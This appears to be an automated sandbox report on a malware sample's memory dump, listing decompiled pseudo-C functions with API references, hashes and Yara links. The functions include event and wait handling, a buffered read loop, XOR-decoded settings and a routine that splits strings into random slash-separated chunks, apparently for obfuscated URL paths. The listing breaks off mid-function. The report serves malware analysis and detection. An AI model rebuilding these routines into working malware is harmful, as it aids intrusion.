                                                          • GetLastError.KERNEL32 ref: 02B9A8C5
                                                          • GetLastError.KERNEL32 ref: 02B9A970
                                                            • Part of subcall function 02B9A734: HeapFree.KERNEL32(00000000,00000000,02B95637,00000000,?,?,00000000), ref: 02B9A740
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                          • String ID:
                                                          • API String ID: 943265810-0
                                                          • Opcode ID: bba1ff30351af9fe8baf04bcbcce574570c67b02c40928e297168b7004726d3e
                                                          • Instruction ID: 041bcfd544fd5974474a44692672866c71abfe1fd6b3d1c3d13d75dacc7efbf0
                                                          • Opcode Fuzzy Hash: bba1ff30351af9fe8baf04bcbcce574570c67b02c40928e297168b7004726d3e
                                                          • Instruction Fuzzy Hash: AB416F71940204BFDF31AFA2DD88E5B7BBDEB89744F104969F642D20A0E731A555CF20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B915FF, Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 42%
                                                          			E02B915FF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x2b9d134() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x2b9d164(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E02B9A71F(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x2b9d134() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E02B95646( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E02B9A734(_v16);
										if(_t64 == 0) {
											_t64 = E02B970CC(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E02B95646( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E02B99242(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}
















                                                          0x02b915ff
                                                          0x02b91600
                                                          0x02b91606
                                                          0x02b91611
                                                          0x02b91611
                                                          0x02b91613
                                                          0x02b918e7
                                                          0x02b918ec
                                                          0x02b918ee
                                                          0x02b918f3
                                                          0x02b918f4
                                                          0x02b918f9
                                                          0x02b918fa
                                                          0x02b91905
                                                          0x02b91936
                                                          0x02b9193b
                                                          0x02b919fe
                                                          0x02b91941
                                                          0x02b91948
                                                          0x02b91950
                                                          0x02b919fb
                                                          0x02b91956
                                                          0x02b9195b
                                                          0x02b91960
                                                          0x02b91965
                                                          0x02b919ed
                                                          0x02b9196b
                                                          0x02b9196b
                                                          0x02b9196d
                                                          0x02b91973
                                                          0x02b91974
                                                          0x02b91974
                                                          0x02b91977
                                                          0x02b9197a
                                                          0x02b91980
                                                          0x02b91985
                                                          0x02b91986
                                                          0x02b9198b
                                                          0x02b9198e
                                                          0x02b91999
                                                          0x00000000
                                                          0x00000000
                                                          0x02b919a1
                                                          0x02b919a9
                                                          0x02b919b5
                                                          0x02b919b9
                                                          0x02b919bb
                                                          0x02b919c0
                                                          0x00000000
                                                          0x00000000
                                                          0x02b919c0
                                                          0x02b919b9
                                                          0x02b919d2
                                                          0x02b919d5
                                                          0x02b919dc
                                                          0x02b919e7
                                                          0x02b919e7
                                                          0x00000000
                                                          0x02b919c2
                                                          0x02b919c2
                                                          0x02b919c7
                                                          0x02b919c9
                                                          0x02b919ca
                                                          0x02b919cd
                                                          0x00000000
                                                          0x02b919cd
                                                          0x00000000
                                                          0x02b919c7
                                                          0x02b91974
                                                          0x02b919ee
                                                          0x02b919ee
                                                          0x02b919f4
                                                          0x02b919f4
                                                          0x02b91950
                                                          0x02b91907
                                                          0x02b9190d
                                                          0x02b91915
                                                          0x02b9192e
                                                          0x02b91930
                                                          0x00000000
                                                          0x00000000
                                                          0x02b91917
                                                          0x02b91921
                                                          0x02b91925
                                                          0x02b9192b
                                                          0x00000000
                                                          0x02b9192b
                                                          0x02b91925
                                                          0x02b91915
                                                          0x02b91a07
                                                          0x02b91608
                                                          0x02b91608
                                                          0x02b9160f
                                                          0x02b9161a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x02b9160f

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 02B918EE
                                                          • GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 02B91907
                                                          • ResetEvent.KERNEL32(?), ref: 02B91980
                                                          • GetLastError.KERNEL32 ref: 02B9199B
                                                            • Part of subcall function 02B99242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 02B99259
                                                            • Part of subcall function 02B99242: SetEvent.KERNEL32(?), ref: 02B99269
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1123145548-0
                                                          • Opcode ID: f95e16fd09c1c50694882d7a548bf436c404239de1a20c8214feb47693b788a6
                                                          • Instruction ID: 72c30fd72703c826f7c37a2780317c1d242e77eb76ae668a150bbd143e9c7294
                                                          • Opcode Fuzzy Hash: f95e16fd09c1c50694882d7a548bf436c404239de1a20c8214feb47693b788a6
                                                          • Instruction Fuzzy Hash: 50411C36A50605AFCF21DFA9CD44BAE77B9EF84350F1005B5E65AD3150D730ED42AB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B93AB0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 02B93B0D
                                                          • SysAllocString.OLEAUT32(02B985ED), ref: 02B93B51
                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B93B65
                                                          • SysFreeString.OLEAUT32(00000000), ref: 02B93B73
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 0d7c1cb6082b48228e3696c05d2a1d2fa638be3832e3a1f9fc9186a63d971bf7
                                                          • Instruction ID: 4aec174e5c8747762bff72bac3f8cf967ee06741a4c5cb626f0a039228600848
                                                          • Opcode Fuzzy Hash: 0d7c1cb6082b48228e3696c05d2a1d2fa638be3832e3a1f9fc9186a63d971bf7
                                                          • Instruction Fuzzy Hash: A6310B71900209EFCF05EF98D8D09AE7BF9FF48354B1184AAF50697251D7309A81CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B911EE, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E02B911EE(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x2b9d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x2b9d2a8; // 0x3e1a5a8
				_t3 = _t8 + 0x2b9e87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E02B938A8(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x2b9d2ac, 1, 0, _t30);
					E02B9A734(_t30);
				}
				_t12 =  *0x2b9d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02B9A65C() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E02B98EA1(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x2b9d10c( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E02B9A273(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                                          0x02b911ef
                                                          0x02b911f6
                                                          0x02b91200
                                                          0x02b91204
                                                          0x02b9120a
                                                          0x02b91219
                                                          0x02b91220
                                                          0x02b91224
                                                          0x02b91236
                                                          0x02b91238
                                                          0x02b91238
                                                          0x02b9123d
                                                          0x02b91244
                                                          0x02b9129b
                                                          0x02b9129b
                                                          0x02b912a1
                                                          0x02b912a3
                                                          0x02b912a3
                                                          0x02b912ad
                                                          0x02b912b1
                                                          0x02b912c3
                                                          0x02b912c3
                                                          0x02b912c7
                                                          0x02b912cd
                                                          0x02b912cd
                                                          0x00000000
                                                          0x02b9125d
                                                          0x02b91262
                                                          0x02b9126a
                                                          0x02b9126e
                                                          0x02b91272
                                                          0x02b91272
                                                          0x02b9127f
                                                          0x02b91283
                                                          0x02b91287
                                                          0x02b912dc
                                                          0x02b912e2
                                                          0x02b912e2
                                                          0x02b91295
                                                          0x02b91299
                                                          0x02b912d0
                                                          0x02b912d2
                                                          0x02b912d5
                                                          0x02b912d5
                                                          0x00000000
                                                          0x02b912d2
                                                          0x02b91299
                                                          0x00000000
                                                          0x02b91283

                                                          APIs
                                                            • Part of subcall function 02B938A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,069B9A98,00000000,?,?,63699BC3,00000005,02B9D00C,?,?,02B95D30), ref: 02B938DE
                                                            • Part of subcall function 02B938A8: lstrcpy.KERNEL32(00000000,00000000), ref: 02B93902
                                                            • Part of subcall function 02B938A8: lstrcat.KERNEL32(00000000,00000000), ref: 02B9390A
                                                          • CreateEventA.KERNEL32(02B9D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02B93760,?,00000001,?), ref: 02B9122F
                                                            • Part of subcall function 02B9A734: HeapFree.KERNEL32(00000000,00000000,02B95637,00000000,?,?,00000000), ref: 02B9A740
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,02B93760,00000000,00000000,?,00000000,?,02B93760,?,00000001,?,?,?,?,02B952AA), ref: 02B9128F
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,02B93760,?,00000001,?), ref: 02B912BD
                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02B93760,?,00000001,?,?,?,?,02B952AA), ref: 02B912D5
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 73268831-0
                                                          • Opcode ID: 57b4ce630210094d1a3ab05d7cdaf4f29cbd4c4e4fce52a5aa36f2d35776733e
                                                          • Instruction ID: e729f5224f608e19d47fdec42f07b482fecb32e7e7bbf552a4d05f2429290a83
                                                          • Opcode Fuzzy Hash: 57b4ce630210094d1a3ab05d7cdaf4f29cbd4c4e4fce52a5aa36f2d35776733e
                                                          • Instruction Fuzzy Hash: 55214632A603025BCF317A6D8D44B6B73A9FB89B54F160AB5F989E7150DB20D8009E90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B99242, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E02B99242(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x2b9d13c; // 0x2b9abf1
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E02B9A71F(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E02B9A734(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E02B95646( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                                          0x02b99242
                                                          0x02b99242
                                                          0x02b9924c
                                                          0x02b99252
                                                          0x02b99255
                                                          0x02b99259
                                                          0x02b9925f
                                                          0x02b99264
                                                          0x02b9927d
                                                          0x02b99280
                                                          0x02b99284
                                                          0x02b99288
                                                          0x02b99289
                                                          0x02b9928e
                                                          0x02b99291
                                                          0x02b99298
                                                          0x02b9929f
                                                          0x02b992f2
                                                          0x02b992f8
                                                          0x02b992fe
                                                          0x02b99339
                                                          0x02b9933f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x02b992fe
                                                          0x02b992a5
                                                          0x00000000
                                                          0x02b992ac
                                                          0x02b992ba
                                                          0x02b992bd
                                                          0x02b992c0
                                                          0x02b992cc
                                                          0x02b992d0
                                                          0x02b99332
                                                          0x02b992d2
                                                          0x02b992d5
                                                          0x02b992d9
                                                          0x02b992da
                                                          0x02b992db
                                                          0x02b992dd
                                                          0x02b992e4
                                                          0x02b99322
                                                          0x02b9932d
                                                          0x02b992e6
                                                          0x02b992e9
                                                          0x02b992ed
                                                          0x02b992ed
                                                          0x02b992e4
                                                          0x00000000
                                                          0x02b992d0
                                                          0x02b992a5
                                                          0x02b99269
                                                          0x02b9926f
                                                          0x02b99272
                                                          0x02b99277
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x02b99307
                                                          0x02b9930f
                                                          0x02b99314
                                                          0x02b99317
                                                          0x00000000

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 02B99259
                                                          • SetEvent.KERNEL32(?), ref: 02B99269
                                                          • GetLastError.KERNEL32 ref: 02B992F2
                                                            • Part of subcall function 02B95646: WaitForMultipleObjects.KERNEL32(00000002,02B9A8E3,00000000,02B9A8E3,?,?,?,02B9A8E3,0000EA60), ref: 02B95661
                                                            • Part of subcall function 02B9A734: HeapFree.KERNEL32(00000000,00000000,02B95637,00000000,?,?,00000000), ref: 02B9A740
                                                          • GetLastError.KERNEL32(00000000), ref: 02B99327
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 602384898-0
                                                          • Opcode ID: f2bc304de57c21fdc0ff024a551047de7d525dd6a5d7d99751944b372c1e60b0
                                                          • Instruction ID: 3752be6d3d0bb98aaa4b5d754e0ecead5420385e3a2f599e90592a3ebcf7160a
                                                          • Opcode Fuzzy Hash: f2bc304de57c21fdc0ff024a551047de7d525dd6a5d7d99751944b372c1e60b0
                                                          • Instruction Fuzzy Hash: 51310CB5D40709EFDF21DFA5D9849AEBBB8EB08344F5089BEE542E3140D731AA449F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B936B1, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 40%
                                                          			E02B936B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E02B93BB9(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E02B94F79(_t23);
						}
					}
					return _t38;
				}
				if(E02B9A2F9(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x2b9d2ac, 1, 0,  *0x2b9d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E02B9A446(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E02B9853F(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E02B94F14(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E02B911EE( &_v32, _t39);
					goto L13;
				}
			}












                                                          0x02b936b1
                                                          0x02b936be
                                                          0x02b936c4
                                                          0x02b936c5
                                                          0x02b936c6
                                                          0x02b936c7
                                                          0x02b936c8
                                                          0x02b936cc
                                                          0x02b936d8
                                                          0x02b936dc
                                                          0x02b93764
                                                          0x02b93764
                                                          0x02b93767
                                                          0x02b93769
                                                          0x02b93771
                                                          0x02b93771
                                                          0x02b93777
                                                          0x02b9377a
                                                          0x02b9377a
                                                          0x02b93777
                                                          0x02b93785
                                                          0x02b93785
                                                          0x02b936ef
                                                          0x02b936f1
                                                          0x02b936f1
                                                          0x02b93708
                                                          0x02b9370c
                                                          0x02b9370f
                                                          0x02b9371a
                                                          0x02b93721
                                                          0x02b93721
                                                          0x02b9372a
                                                          0x02b9372e
                                                          0x02b9373c
                                                          0x02b93730
                                                          0x02b93730
                                                          0x02b93731
                                                          0x02b93732
                                                          0x02b93733
                                                          0x02b93734
                                                          0x02b93735
                                                          0x02b93735
                                                          0x02b93741
                                                          0x02b93744
                                                          0x02b93748
                                                          0x02b9374a
                                                          0x02b9374a
                                                          0x02b93751
                                                          0x00000000
                                                          0x02b93753
                                                          0x02b93753
                                                          0x02b93760
                                                          0x00000000
                                                          0x02b93760

                                                          APIs
                                                          • CreateEventA.KERNEL32(02B9D2AC,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,02B952AA,?,00000001,?), ref: 02B93702
                                                          • SetEvent.KERNEL32(00000000,?,?,?,02B952AA,?,00000001,?,00000002,?,?,02B95D5E,?), ref: 02B9370F
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,02B952AA,?,00000001,?,00000002,?,?,02B95D5E,?), ref: 02B9371A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,02B952AA,?,00000001,?,00000002,?,?,02B95D5E,?), ref: 02B93721
                                                            • Part of subcall function 02B9A446: WaitForSingleObject.KERNEL32(00000000,?,?,?,02B93741,?,02B93741,?,?,?,?,?,02B93741,?), ref: 02B9A520
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 2559942907-0
                                                          • Opcode ID: 9782f8089733c00b461bc12c86957093f597d03d8de1b2fc21b96cbc79665a7e
                                                          • Instruction ID: c5dde64aa7c3968c31c4d9123cd799a013e014a72852ae6c6b527e6fe54ad3a3
                                                          • Opcode Fuzzy Hash: 9782f8089733c00b461bc12c86957093f597d03d8de1b2fc21b96cbc79665a7e
                                                          • Instruction Fuzzy Hash: 6921A7B3D00219ABCF10BFE58985DAEB7FAEB48394F0148F5EA15E7100D7399945CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B917E5, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E02B917E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x2b9d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x2b9d250; // 0x4ae18bb4
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x2b9d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                          0x02b917ed
                                                          0x02b917f0
                                                          0x02b917f6
                                                          0x02b9180e
                                                          0x02b91810
                                                          0x02b91815
                                                          0x02b91817
                                                          0x02b9181a
                                                          0x02b9181c
                                                          0x02b9181f
                                                          0x02b91821
                                                          0x02b91821
                                                          0x02b91823
                                                          0x02b9182e
                                                          0x02b91833
                                                          0x02b91844
                                                          0x02b9184c
                                                          0x02b91851
                                                          0x02b91854
                                                          0x02b91857
                                                          0x02b91859
                                                          0x02b9185c
                                                          0x02b9185f
                                                          0x02b9185f
                                                          0x02b91862
                                                          0x02b9186d
                                                          0x02b91872
                                                          0x02b9187c

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02B91C49,00000000,?,?,02B920C2,?,069B95B0), ref: 02B917F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 02B91808
                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,02B91C49,00000000,?,?,02B920C2,?,069B95B0), ref: 02B9184C
                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 02B9186D
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: af886dfc90bdfbe4c6c5ad709a0d3ce19deeecec39a708f6dc73e0ca954e8fda
                                                          • Instruction ID: d9247b055959c4c92d30763038eda51bab698ce3a64eedb39b448436f4391982
                                                          • Opcode Fuzzy Hash: af886dfc90bdfbe4c6c5ad709a0d3ce19deeecec39a708f6dc73e0ca954e8fda
                                                          • Instruction Fuzzy Hash: 1D11C672E00115AFD7108B69DD84E9EBFAEDB857A0B0501B6F54497150E7709E14D7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B9486F, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E02B9486F(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E02B9A71F(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x2b9c284);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
